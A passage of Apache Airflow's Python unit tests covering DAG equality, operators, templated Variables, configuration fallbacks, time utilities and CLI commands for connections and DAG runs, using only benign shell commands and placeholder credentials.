dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
configuration.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.get("core", "FERNET_KEY")
configuration.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', 'conn_type', 'conn_host', 'conn_login', 'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
